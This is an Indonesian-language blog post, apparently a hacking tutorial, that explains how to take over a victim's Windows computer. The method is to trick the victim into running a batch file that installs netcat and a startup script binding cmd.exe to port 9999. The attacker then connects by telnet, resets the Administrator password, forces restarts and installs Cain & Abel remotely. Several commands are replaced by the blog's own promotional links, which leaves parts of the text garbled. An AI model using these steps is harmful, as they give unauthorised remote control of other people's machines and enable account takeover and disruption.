Translate

Hack Network

Saya menulis ini karena benar-benar bekerja untuk saya beberapa kali dan saya berharap hal itu untuk Anda juga, semua yang Anda butuhkan adalah target yang sangat mudah ditipu.  Seperti kita semua tahu, sebuah Trojan sangat mungkin akan dijemput oleh AV, apa yang Anda butuhkan adalah netcat, netcat membuka port pada komputer untuk akses (Jika digunakan dengan benar oleh batch file Anda membuka port pada komputer target). Anda akan perlu menulis sebuah file batch. File batch untuk menyalin netcat pada komputer remote harus dijalankan dari komputer target (Orang pada target harus mengeksekusi batch file dalam beberapa cara). Buka Notepad dan ketik ini:

ANDA HARUS KE http://hacking-tutor.blogspot.com

Menyimpan file sebagai file batch menggunakan Notepad.  http://hacking-tutor.indonesianforum.net

File batch selanjutnya akan digunakan untuk memastikan port yang Anda tentukan membuka setiap jendela waktu mulai Facebook, Anda dapat menentukan port apapun yang Anda inginkan. Buka Notepad dan ketik:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Simpan file sebagai file batch dengan menggunakan Notepad, ini akan menjadi file yang disalin ke folder startup di file batch sebelumnya kita tulis. Anda dapat mengikat batch file ke file dan berbagi file, membiarkan target mengeksekusi file tersebut sehingga ia dapat menyalin netcat dan file batch lain ke / komputer miliknya itu sehingga membuka port 9999, setelah port 9999 telah dibuka maka Anda dapat menggunakan telnet dan telnet ke port pada komputer target untuk memiliki akses penuh tanpa pernah perlu ada password apa pun. Setelah Anda berada dalam mengubah password Administrator jika sesuatu terjadi pada file Anda, perintahnya adalah ini:

net user Administrator Newpassword

Sekarang dari sini Anda bisa melakukan apa yang Anda inginkan, misalnya mencoba mematikan komputer target dengan browsing ke folder system32 dan kemudian ketik:

http://hacking-tutor.blogspot.com/ http://hacking-tutor.blogspot.com/

komputer kemudian akan melakukan restart 10 kali detik. Anda bahkan bisa bermain sekitar lebih oleh Cain & Abel Instalasi pada komputer Anda dan kemudian menginstal Abel dari jarak jauh pada komputer (Karena Anda tahu password Administrator) Setelah Anda Abel pada target Anda dapat mulai dan berhenti layanan dan melakukan lebih banyak!

No comments:

Post a Comment